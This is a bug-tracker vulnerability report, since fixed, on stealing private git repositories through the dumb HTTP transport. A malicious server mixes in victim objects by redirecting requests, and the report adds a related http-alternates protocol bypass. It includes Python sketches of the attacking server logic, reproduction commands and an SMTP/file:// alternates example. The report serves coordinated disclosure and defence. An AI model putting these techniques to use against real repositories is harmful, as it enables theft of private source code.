Status: Fixed
Closed: Feb 2017
Git: private repository theft by mixing repositories
Project Member Reported by jannh@google.com, Nov 10 2016
This bug report assumes the following scenario:

 - A victim has access to a private git repository.
 - An attacker who knows the URL to the private repository wants to
   steal its contents.
 - The private git repository can be accessed over http or https.
 - The private git repository supports the dumb HTTP transport.
 - The victim authenticates to the private git repository either by source IP
   (imagine a git server in a company's internal network without explicit
   authentication) or has the credentials stored in a .netrc file.
 - To simplify the attack, it is assumed that the private git repository only
   contains one branch and no tags.
 - The attacker can convince the victim to pull a repository from the attacker's
   server, create a new commit in it and afterwards perform a push to the
   victim's server.
 - The victim retries fetching the attacker's repository if the first attempt
   fails.
 - I think packfiles on the server might block this attack.

The basic idea of the attack is:
In the dumb HTTP protocol, each object is fetched using a separate HTTP
request, and git instructs curl to follow HTTP redirects. A server can
therefore "mix in" objects from another server during a fetch/clone operation
by selectively redirecting requests to that other server. If the user does not
inspect all subdirectories of the cloned repository and pushes the cloned
repository back to the internet, the mixed-in objects will be pushed as well.
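
The per-request decision behind this "mixing" can be sketched as follows. This
is only an illustration, not the attached forward.py: the helper name
`choose_response`, its `exists` parameter and the victim URL
`http://victim.example/repo.git` are assumptions made for the example.

```python
import os

# Hypothetical victim URL, used only for illustration.
VICTIM_BASE = "http://victim.example/repo.git"


def choose_response(local_git_dir, request_path, victim_base=VICTIM_BASE,
                    exists=os.path.isfile):
    """Decide how a mixing server answers one dumb-HTTP request.

    Returns ("serve", local_file) when the attacker's own repository has
    the requested file, otherwise ("redirect", url) pointing at the same
    relative path on the victim server.
    """
    relative = request_path.lstrip("/")
    local_file = os.path.join(local_git_dir, relative)
    if exists(local_file):
        return ("serve", local_file)
    return ("redirect", victim_base.rstrip("/") + "/" + relative)
```

Because every loose object is requested separately, this decision is made
independently for each object, which is what lets a single clone combine
objects from two servers.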

More detailed steps of the attack:
1. When the user attempts to clone from the attacking server for the first time,
   forward all accesses to the victim server. This allows the attacker to
   observe object IDs from the repository (because they are sent in URLs).
   If there is only one branch, the first request for an object ID will be for
   the latest commit, and the second one will be for the latest commit's tree.
   After the object ID of the tree has been observed, all requests that arrive
   within a short timeframe can be rejected with an HTTP response like
   "500 temporary error" or so.
   Now, since the victim tree's object ID is known, the attacker can construct a
   git repository in which some tree contains an entry pointing to the victim
   tree.
2. When the user retries the clone operation (or someone else in the same
   network does), the attacker responds to requests with files from his own
   repository. If a requested object doesn't exist, it is assumed that the
   object is present on the victim server, and a redirect is sent.
   After this step, the victim user should have a repository that contains the
   attacker-created tree, with the contents of the private git repository's tree
   hidden in some subdirectory. (A sneakier way would be to hide the private
   repository's tree somewhere in the history, not under the head commit.)
3. If the user now pushes the contents of the cloned repository (perhaps after
   adding a few more commits or so), the pushed repository contains a copy of
   the private repository's tree.
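
Step 1 relies on object IDs being visible in request paths. A minimal sketch of
how a forwarding server could record them, assuming the usual loose-object
layout `objects/<2 hex chars>/<38 hex chars>`; the names `object_id_from_path`
and `Observer` are hypothetical and not taken from forward.py:

```python
import re

# Loose objects are requested as objects/<2 hex chars>/<38 hex chars>.
LOOSE_OBJECT_RE = re.compile(r"/objects/([0-9a-f]{2})/([0-9a-f]{38})$")


def object_id_from_path(request_path):
    """Return the 40-character object ID named by a request path, or None."""
    match = LOOSE_OBJECT_RE.search(request_path)
    if match is None:
        return None
    return match.group(1) + match.group(2)


class Observer:
    """Records object IDs in the order in which they are first requested."""

    def __init__(self):
        self.seen = []

    def record(self, request_path):
        object_id = object_id_from_path(request_path)
        if object_id is not None and object_id not in self.seen:
            self.seen.append(object_id)
        return object_id

    @property
    def commit_id(self):
        # With one branch and no tags, the first object is the head commit.
        return self.seen[0] if len(self.seen) >= 1 else None

    @property
    def tree_id(self):
        # The second object requested is that commit's tree.
        return self.seen[1] if len(self.seen) >= 2 else None
```

Once `tree_id` is set, the server has what it needs and can start failing
requests, as described in step 1.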

An issue for the attacker is that git attempts to optimize away redirects by
emulating redirects locally if the redirect scheme looks predictable (in
update_url_from_redirect()). However, this can be worked around by appending a
dummy parameter to the URL, causing git to bail out of the optimization (the
"insane redirect scheme" case).

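The redirect optimization and its bypass can be modeled roughly like this. The
sketch is a simplified Python model of the behavior described above, not git's
actual C code; the function names and the parameter name `dummy` are
assumptions made for illustration.

```python
def update_base_from_redirect(base, asked, got):
    """Simplified model of deriving a new base URL after a redirect.

    `asked` is the base URL plus some tail (for example "/info/refs").
    If the redirect target `got` ends with the same tail, the part before
    it is treated as the new base URL. Otherwise None is returned, which
    stands for the case where no new base can be derived.
    """
    if asked == got:
        return base
    if not asked.startswith(base):
        raise ValueError("asked URL does not start with the base URL")
    tail = asked[len(base):]
    if not got.endswith(tail):
        return None
    return got[:len(got) - len(tail)]


def redirect_with_dummy_parameter(victim_base, tail):
    """Build a redirect target whose suffix no longer matches the tail."""
    return victim_base + tail + "?dummy=1"
```

With a predictable redirect the model returns the victim's base URL, so later
requests would go to the victim server directly and the attacker would lose
control over them. With the dummy parameter appended it returns None, and each
request keeps going through the attacker's server.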

Reproduction instructions:

Prepare the private repository:

~$ mkdir -p tmp/gitmix/victim_repo
~$ cd tmp/gitmix/victim_repo
~/tmp/gitmix/victim_repo$ git init
Initialized empty Git repository in [...]/tmp/gitmix/victim_repo/.git/
~/tmp/gitmix/victim_repo$ echo 'this is secret!' > secret.txt
~/tmp/gitmix/victim_repo$ git add secret.txt
~/tmp/gitmix/victim_repo$ git commit -m'initial commit'
[master (root-commit) 9f73f5b] initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 secret.txt
~/tmp/gitmix/victim_repo$ git update-server-info
~/tmp/gitmix/victim_repo$ cd .git/
~/tmp/gitmix/victim_repo/.git$ python -m SimpleHTTPServer 8001 .
Serving HTTP on 0.0.0.0 port 8001 ...


In a new tab, prepare the attacker's repository, where `forward.py` is the
attached file:

~$ mkdir tmp/gitmix/attacker_repo
~$ cd tmp/gitmix/attacker_repo
~/tmp/gitmix/attacker_repo$ git init
Initialized empty Git repository in [...]/tmp/gitmix/attacker_repo/.git/
~/tmp/gitmix/attacker_repo$ echo 'just a harmless repo' > harmless_file
~/tmp/gitmix/attacker_repo$ git add harmless_file
~/tmp/gitmix/attacker_repo$ git commit -m'initial commit'
[master (root-commit) 7e13ade] initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 harmless_file
~/tmp/gitmix/attacker_repo$ git update-server-info
~/tmp/gitmix/attacker_repo$ python [...]/forward.py
serving at port 8000

Now, in another tab, as the victim user:

~$ cd tmp/gitmix/
~/tmp/gitmix$ git clone http://localhost:8000/
Cloning into 'localhost'...
error: The requested URL returned error: 500 temporary error, please try again (curl_result = 22, http_code = 500, sha1 = fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5)
error: Unable to find fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5 under http://localhost:8000
Cannot obtain needed tree fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5
while processing commit 9f73f5bade6cac025eb9bbc726fafe3cf878586c.
error: fetch failed.
~/tmp/gitmix$ # ensure at least 1s of delay here, then retry
~/tmp/gitmix$ git clone http://localhost:8000/
Cloning into 'localhost'...
Checking connectivity... done.
~/tmp/gitmix$ tree localhost/
localhost/
├── boring_subdir
│   └── secret.txt
└── harmless_file

1 directory, 2 files
~/tmp/gitmix$ cat localhost/harmless_file 
just a harmless repo
~/tmp/gitmix$ cat localhost/boring_subdir/secret.txt 
this is secret!

As you can see, the victim user indeed ends up with a repository that contains
a mix of data from the attacker's repository and from the private repository.
At this point, pushing to any repository will leak the contents of the private
repository.
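
The mixed tree can be built without ever seeing the victim's file contents,
because a tree entry only names an object ID. The following sketch serializes
and hashes such a tree by hand, assuming git's SHA-1 object format; the helper
names are hypothetical, and the tree ID is the one from the error message in
the transcript above.

```python
import hashlib


def object_id(kind, body):
    """Hash an object as git does: SHA-1 over '<kind> <size>' NUL <body>."""
    header = kind.encode() + b" " + str(len(body)).encode() + b"\0"
    return hashlib.sha1(header + body).hexdigest()


def tree_body(entries):
    """Serialize tree entries given as (mode, name, hex_object_id) tuples.

    Entries are sorted by name, with directory names compared as if they
    ended in '/'.
    """
    def sort_key(entry):
        mode, name, _ = entry
        return name.encode() + (b"/" if mode == "40000" else b"")

    body = b""
    for mode, name, hex_id in sorted(entries, key=sort_key):
        body += mode.encode() + b" " + name.encode() + b"\0"
        body += bytes.fromhex(hex_id)
    return body


# Tree ID observed during the first clone attempt in the transcript above.
VICTIM_TREE = "fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5"

harmless_blob = object_id("blob", b"just a harmless repo\n")
mixed_tree = object_id("tree", tree_body([
    ("100644", "harmless_file", harmless_blob),
    ("40000", "boring_subdir", VICTIM_TREE),
]))
print(mixed_tree)
```

The attacker's repository then contains this tree but not the object behind
`boring_subdir`, so the request for it is the one that gets redirected to the
private repository.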

To remove the restriction that the private repository must not have more than
one branch, a variation could be employed; for example, the attacker could store
the first observed object ID instead of the second one (thereby guaranteeing
that it belongs to a commit) and then rebase his whole history on top of that
commit ID.
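
A sketch of that variation, assuming git's SHA-1 commit format: the attacker's
root commit simply names the observed commit as its parent. The identity
string, the timestamp and the helper names are made up for the example, and
the empty tree stands in for the attacker's real tree.

```python
import hashlib

# Commit ID observed as the first requested object in the transcript above.
VICTIM_COMMIT = "9f73f5bade6cac025eb9bbc726fafe3cf878586c"

# ID of git's empty tree, used here as a stand-in for the attacker's tree.
EMPTY_TREE = "4b825dc642cb6eb9a060e54bf8d69288fbee4904"


def commit_body(tree_id, parent_ids, message,
                ident="Attacker <attacker@example.com> 1478736000 +0000"):
    """Serialize a commit object body with the given tree and parents."""
    lines = ["tree " + tree_id]
    lines += ["parent " + parent for parent in parent_ids]
    lines += ["author " + ident, "committer " + ident, "", message]
    return ("\n".join(lines) + "\n").encode()


def commit_id(body):
    """Hash the commit as git does: SHA-1 over 'commit <size>' NUL <body>."""
    header = b"commit " + str(len(body)).encode() + b"\0"
    return hashlib.sha1(header + body).hexdigest()


body = commit_body(EMPTY_TREE, [VICTIM_COMMIT], "harmless-looking commit")
print(commit_id(body))
```

Since the parent commit is missing from the attacker's repository, the client
requests it, and everything reachable from it, via redirects to the private
repository.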

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a
broadly available patch, then the bug report will automatically become visible
to the public.
 
forward.py
3.0 KB
Project Member Comment 1 by jannh@google.com, Nov 11 2016
The description of the scenario is wrong: "The attacker can convince the victim to [...] and afterwards perform a push to the victim's server." should be "The attacker can convince the victim to [...] and afterwards perform a push to the attacker's server.".
Project Member Comment 2 by jannh@google.com, Nov 14 2016
I found the following related issues and also reported them to Git:

============
Unfortunately, when I reported these issues, I had not yet looked at the
http-alternates mechanism. That mechanism explicitly permits mixing
objects from remote servers in, as an explicit feature. So while patch 2/4
should still do its job, I think at least the part of patch 4/4 where redirects
are blocked can be circumvented using alternates - and fixing that
would, as far as I can tell, require a breaking change that requires opt-in
before remote alternates can be used. :/

Can you do a breaking change for this and require explicit opt-in (either
by the user or by the server whose objects are mixed in, e.g. by requiring
that /objects/info/http-alternate-target is present on the target server or
something like that)? I realize that, for people who actually rely on
http-alternates, this would be quite an annoyance. :/


More importantly, there is a separate issue with alternates: The code for
handling the "http-alternates" file does not perform any checks on the
protocols of supplied URLs as long as they contain something like "://".
Because, when alternates are used, the redirect doesn't happen inside
curl, but instead happens in git, CURLOPT_REDIR_PROTOCOLS has
no effect, and all the protocols libcurl supports can be used. These
protocols are, quoting from the curl homepage, "DICT, FILE, FTP,
FTPS, Gopher, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3,
POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMTP, SMTPS, Telnet and
TFTP" (although some distros, like Debian, omit e.g. scp and sftp
support - you can check for that with "curl --version").

So for example, when you clone from an http remote that serves an
"http-alternates" file with content
"smtp://127.123.123.123///////////////////blaz" and replies to a request
for some object with a 404 status code, this happens:

$ strace -f git clone http://localhost:8080 2>&1 | grep 'connect(.*123.123'
[pid 147453] connect(4, {sa_family=AF_INET, sin_port=htons(25),
sin_addr=inet_addr("127.123.123.123")}, 16) = -1 EINPROGRESS
(Operation now in progress)
[pid 147453] connect(3, {sa_family=AF_INET, sin_port=htons(25),
sin_addr=inet_addr("127.123.123.123")}, 16) = -1 EINPROGRESS
(Operation now in progress)

As you can see, git tries to create an SMTP connection (port 25).

(To reproduce, create a git repository, make a commit, prepare the
repo for dumb HTTP cloning, delete a random object from the
repository, create the http-alternates file, launch an HTTP server that
serves from the repo directory and clone from it.)

The file:/// protocol also works, so that allows you to mix in objects from
the developer's local filesystem, which I think might actually be worse
than being able to pull in objects from http(s) servers.

So I think you should set CURLOPT_PROTOCOLS and/or filter
the protocol name.
============
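
The "filter the protocol name" suggestion could look roughly like the
following. This is a sketch of the idea only, not the fix that went into git;
the allowlist of http and https and the function name are assumptions.

```python
from urllib.parse import urlsplit

# Assumed allowlist for illustration; the report only asks that the
# protocol be restricted, not which protocols to allow.
ALLOWED_SCHEMES = {"http", "https"}


def is_acceptable_alternate(url, allowed=ALLOWED_SCHEMES):
    """Return True only for alternates whose scheme is on the allowlist."""
    return urlsplit(url).scheme.lower() in allowed
```

Both the SMTP example above and a file:/// URL are rejected by this check.
Entries without a scheme are rejected as well, so anything other than a full
URL would need separate handling.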

Jeff King from Git's security group pointed out that, on recent git versions, this doesn't permit grabbing objects from arbitrary normal local repositories via file://, apparently because of commit 17966c0a63d2 (from July 2016), but it probably still works on many distros.


Jeff King has already prepared comprehensive fixes for all of the issues I've reported. I've looked at them and tested them, and apart from some minor things, they look good.
Project Member Comment 3 by jannh@google.com, Dec 1 2016
Patches are now public (but haven't landed yet): http://marc.info/?l=git&m=148058312026060&w=2

The interesting patches, with nice explanations of the individual issues:
http://marc.info/?l=git&m=148058310126056&w=2 [PATCH 2/6] http: always update the base URL for redirects
http://marc.info/?l=git&m=148058349726174&w=2 [PATCH 4/6] http: make redirects more obvious
http://marc.info/?l=git&m=148058351226181&w=2 [PATCH 5/6] http: treat http-alternates like redirects
Project Member Comment 4 by jannh@google.com, Feb 7 2017
Labels: -Restrict-View-Commit
Status: Fixed
Release 2.11.1 contains the fixes and was released 2017-02-02.